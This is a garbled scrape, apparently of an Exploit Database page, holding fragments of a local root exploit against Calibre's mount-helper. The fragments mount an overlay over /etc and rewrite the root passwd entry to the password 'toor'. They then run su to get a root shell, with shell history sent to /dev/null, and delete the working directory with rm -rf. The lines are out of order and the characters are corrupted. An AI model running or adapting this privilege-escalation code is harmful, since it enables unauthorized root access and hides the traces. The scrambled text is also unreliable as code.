The Exploit Database is maintained by Offensive Security, an information security training company Su -c "echo \" Unmounting /etc using root umount.\" umount /etc echo \" Cleaning up: $dir\" rm -rf \"$dir\" echo \" Getting shell.\" HISTFILE=\"/dev/null\" exec /bin/sh" When prompted for a password, enter 'toor'." # Password: Įcho "#"Įcho -n " Making temporary directory: "Įcho " Mounting overlay image using calibre-mount-helper."Ĭalibre-mount-helper mount overlay stagingĮcho " Tampering with overlay's passwd."Įcho "root:$(echo -n 'toor' | openssl passwd -1 -stdin):0:0:root:/root:/bin/bash" > tmpĮcho " Unmounting overlay image using calibre-mount-helper."Ĭalibre-mount-helper eject overlay staging >/dev/null 2>&1Įcho " Mounting overlay to /etc using calibre-mount-helper."Ĭalibre-mount-helper mount overlay /etc >/dev/null 2>&1Įcho " Asking for root. When prompted for a password, enter 'toor'.
# Mounting overlay to /etc using calibre-mount-helper. # Unmounting overlay image using calibre-mount-helper. # Mounting overlay image using calibre-mount-helper. # Making temporary directory: /tmp/tmp.OGgS0jaoD4 # image over /etc, we are able to tinker /etc/passwd and make the root password
# us to mount a vfat filesystem anywhere we want. # more fundumental issue with Calibre's mount helper - namely, that it allows # and get root, in my ".50-Calibrer Assault Mount" exploit. # Yesterday we learned how Calibre's usage of execlp allowed us to override PATH 60-Calibrer Assault Mount: Another Calibre E-Book Reader Local Root
0 kommentar(er)
